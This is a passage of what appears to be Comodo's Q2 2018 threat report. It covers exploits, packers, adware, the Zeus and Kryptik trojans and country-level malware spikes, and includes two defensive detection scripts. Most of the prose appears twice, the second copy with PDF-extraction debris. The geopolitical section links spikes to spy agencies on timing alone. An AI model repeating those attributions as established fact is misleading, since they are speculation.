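        if ev["EventID"] == 4720:
            created[ev["TargetSid"]] = (when, ev)
        elif ev["EventID"] == 4732 and ev["TargetSid"] == ADMINISTRATORS_SID:
            hit = created.get(ev["MemberSid"])
            if hit is None:
                continue          # pre-existing account; a different, noisier rule's job
            created_at, create_ev = hit
            if when - created_at <= window:
                alerts.append({
                    "account": create_ev["TargetUserName"],
                    "sid": ev["MemberSid"],
                    "created_by": create_ev["SubjectUserName"],
                    "elevated_by": ev["SubjectUserName"],
                    "seconds_to_admin": (when - created_at).total_seconds(),
                })
    return alerts


if __name__ == "__main__":
    for alert in find_new_admin_accounts(SAMPLE_EVENTS):
        print(alert)
```

Widening the window trades precision for recall: with the samples above, a window of a day or more also flags the helpdesk-created account.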
5.2.4 Exploits

Computer exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2, Germany (de) was the top country of detection for Constructors.

And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and it leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018, Russia was the #1 home to malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
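One defensive consequence of the mechanism described above: because the packed payload is compressed or encrypted, its bytes have near-maximal entropy, and the stock UPX stub leaves recognisable section names (UPX0, UPX1) and a "UPX!" marker in the file. A modified UPX build may rename those strings, which is why the entropy measurement is the more robust of the two signals. The Python below is an added triage example, not Comodo's tooling; the PE sections are constructed in memory, with a seeded PRNG standing in for compressed output, rather than parsed from a real executable.

```python
"""Packed-binary triage: flag PE sections whose name or entropy points at a
packer. Added example; the section contents are constructed, not real files."""
import math
import random
from collections import Counter

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}  # names written by the stock UPX stub
UPX_MAGIC = b"UPX!"                            # marker the stock UPX build leaves in the file
ENTROPY_THRESHOLD = 7.0                        # bits per byte; compressed/encrypted data nears 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage_sections(sections):
    """sections: iterable of (name, raw_bytes). Returns one finding per section;
    an empty `reasons` list means nothing about that section looks packed."""
    findings = []
    for name, raw in sections:
        ent = shannon_entropy(raw)
        reasons = []
        if name in UPX_SECTION_NAMES:
            reasons.append("UPX section name")
        if UPX_MAGIC in raw:
            reasons.append("UPX! marker present")
        if raw and ent >= ENTROPY_THRESHOLD:
            reasons.append(f"entropy {ent:.2f} >= {ENTROPY_THRESHOLD}")
        findings.append({"section": name, "size": len(raw),
                         "entropy": round(ent, 2), "reasons": reasons})
    return findings


def high_entropy_fraction(sections) -> float:
    """Share of all section bytes that sit in high-entropy sections; a packed
    file keeps almost everything in one such blob next to a tiny stub."""
    total = sum(len(raw) for _, raw in sections)
    if total == 0:
        return 0.0
    high = sum(len(raw) for _, raw in sections
               if raw and shannon_entropy(raw) >= ENTROPY_THRESHOLD)
    return high / total


def is_probably_packed(sections) -> bool:
    return any(f["reasons"] for f in triage_sections(sections))


# Constructed samples. A normal build: repetitive code bytes, readable strings,
# zero-initialised data. None of these approach the entropy threshold.
PLAIN_SECTIONS = [
    (".text", bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x90, 0xC3]) * 512),
    (".rdata", b"Error: could not open configuration file\0" * 64),
    (".data", bytes(256) * 8),
]

# A UPX-style layout: UPX0 reserved for the unpacked image (zero raw size),
# UPX1 holding the compressed payload (seeded PRNG output stands in for it),
# and a small resource section carrying the packer marker.
_rng = random.Random(2018)
PACKED_SECTIONS = [
    ("UPX0", b""),
    ("UPX1", bytes(_rng.getrandbits(8) for _ in range(8192))),
    (".rsrc", b"\0" * 512 + UPX_MAGIC + b"\0" * 12),
]


if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SECTIONS), ("packed", PACKED_SECTIONS)):
        print(label, is_probably_packed(sample), round(high_entropy_fraction(sample), 3))
        for finding in triage_sections(sample):
            print("  ", finding)
```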
5.3.3 Email Flooder

Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. After which, these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the number of usual detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder for antivirus software to detect. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
REQUEST A DEMO

Try Comodo Cybersecurity by speaking with a security consultant to begin the process to set up a demo or proof-of-concept project. Contact us directly at +1 888-266-6361.

© 2018 ALL RIGHTS RESERVED. COMODO SECURITY SOLUTIONS, INC. VISIT COMODO.COM

NORTH AMERICA: Comodo Security Solutions, Inc., 1255 Broad Street, Clifton, NJ 07013, United States. Tel +1 (888) 551 1531, Tel +1 (888) 266 6361, Int +1 (703) 581 6361, Fax +1 (973) 777 4394, sales@comodo.com

EUROPE: Comodo Security Solutions, Inc., Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772

ASIA: Comodo Security Solutions Pvt. Ltd., Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800, www.comodo.co.in
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

About Comodo Cybersecurity

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group, Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only as a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
Finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these applications. They include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".
As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed bundled with additional malware that users then install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but it now has the ability to target email clients, file browsers and file managers. CNET wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and that it has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.
Two conclusions follow. First, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out in this data. What happened in the US on that day, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities. These agencies then immediately began to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. At the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland revealed that it took place almost exclusively in Vantaa, a suburb of Helsinki, precisely where the summit was scheduled to take place.
8 Conclusions
